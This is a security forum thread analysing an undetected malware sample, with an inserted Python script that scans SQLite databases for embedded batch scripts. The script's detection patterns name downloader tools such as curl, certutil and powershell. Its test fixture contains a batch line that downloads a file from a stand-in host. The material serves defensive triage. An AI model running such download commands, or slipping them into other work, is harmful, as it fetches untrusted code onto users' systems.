Posted (edited)

It is from 2020 yet not detected by ESET? Very strange if the sample is not broken somehow which is unlikely based on the behavior on VT. 

Edited by SeriousHoax
  • Administrators
Posted

The archive contains the NSSM potentially unsafe application, which is detected. Besides that, there is also an old file svchost.exe from 2018 which is detected by a few AVs, but it's probably not malicious per se but loads a batch script from the SQLite database OnTimer.db. The script downloads a payload from a dead URL which used to serve the Win64/CoinMiner.OF potentially unwanted application in the past (detected since 2019). I've sent svchost.exe to the virus lab to find out if it's subject to detection or not.
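A triage sketch for the behaviour described in the post above, added here as an example and not part of the original thread or any ESET tooling: it walks every table of a SQLite file and flags TEXT/BLOB cells that look like an embedded batch script or download stub. The `Timers` table, its columns, the sample script and the indicator patterns are all constructed assumptions, since the real OnTimer.db schema is not given in the thread.

```python
import re
import sqlite3

# Heuristic indicators that a stored value is a script or download stub
# (patterns chosen for this example, not taken from the thread).
INDICATORS = {
    "url": re.compile(r"https?://[^\s\"'<>]+", re.I),
    "batch": re.compile(r"(?im)^\s*@?(echo\s+off|schtasks\b|reg\s+add\b|sc\s+create\b)"),
    "downloader": re.compile(r"(?i)\b(certutil|bitsadmin|powershell|curl|wget)\b"),
}

def quote(identifier):
    """Quote a table/column name so odd names cannot break the SQL."""
    return '"' + identifier.replace('"', '""') + '"'

def scan_sqlite(conn):
    """Check every TEXT/BLOB cell in every table; return one dict per suspicious cell."""
    hits = []
    tables = [r[0] for r in conn.execute("SELECT name FROM sqlite_master WHERE type='table'")]
    for table in tables:
        columns = [r[1] for r in conn.execute(f"PRAGMA table_info({quote(table)})")]
        for col in columns:
            sql = (f"SELECT {quote(col)} FROM {quote(table)} "
                   f"WHERE typeof({quote(col)}) IN ('text', 'blob')")
            for (value,) in conn.execute(sql):
                text = value.decode("utf-8", "replace") if isinstance(value, bytes) else value
                matched = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
                if matched:
                    hits.append({"table": table, "column": col, "indicators": matched,
                                 "urls": INDICATORS["url"].findall(text)})
    return hits

def build_sample():
    """Constructed stand-in database; the real OnTimer.db schema is not known here."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Timers (Id INTEGER, Name TEXT, Action BLOB)")
    script = b"@echo off\r\ncurl -o %TEMP%\\u.bin http://dead-host.example.invalid/u.bin\r\n"
    conn.execute("INSERT INTO Timers VALUES (1, 'daily reminder', NULL)")
    conn.execute("INSERT INTO Timers VALUES (2, 'update check', ?)", (script,))
    return conn

if __name__ == "__main__":
    # For a file on disk, open it read-only: sqlite3.connect("file:OnTimer.db?mode=ro", uri=True)
    for hit in scan_sqlite(build_sample()):
        print(hit)
```

Any URL it reports is a lead to check against proxy or DNS logs; a hit only means the cell resembles a script, not that the database is malicious.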

Posted (edited)
4 hours ago, Marcos said:

The archive contains NSSM potentially unsafe application which is detected.

Is this only upon execution of the sample .exe? It was not detected upon file creation;

[Screenshot: Eset_Sample]

Ditto for LiveGuard analysis. Does LiveGuard ignore Eset PUA detections?

Quote

Time;Hash;File;Size;Category;Reason;Sent to;User
6/29/2024 5:24:06 PM;A268031D2E74F058CBB2AD984E4A5556F59CFCF8;C:\Users\18436\Downloads\9aaf2a66b2754921fe133385136dc6fbe7bc730d5302a002103980bdfc13a1be.exe;1070725;Executable;Automatic;ESET LiveGuard;xxxxxxxxxxx

-EDIT- I downloaded the sample again. Now Eset detects upon archive extraction;

Quote

Time;Scanner;Object type;Object;Detection;Action;User;Information;Hash;First seen here
6/30/2024 12:13:36 PM;Real-time file system protection;file;C:\Users\xxxxxx\Downloads\9aaf2a66b2754921fe133385136dc6fbe7bc730d5302a002103980bdfc13a1be.exe;multiple detections;deleted;xxxxxxx;Event occurred on a new file created by the application: C:\Program Files\7-Zip\7zG.exe (755AF3328261B37426BC495C6C64BBA0C18870B2).;A268031D2E74F058CBB2AD984E4A5556F59CFCF8;

 

Edited by itman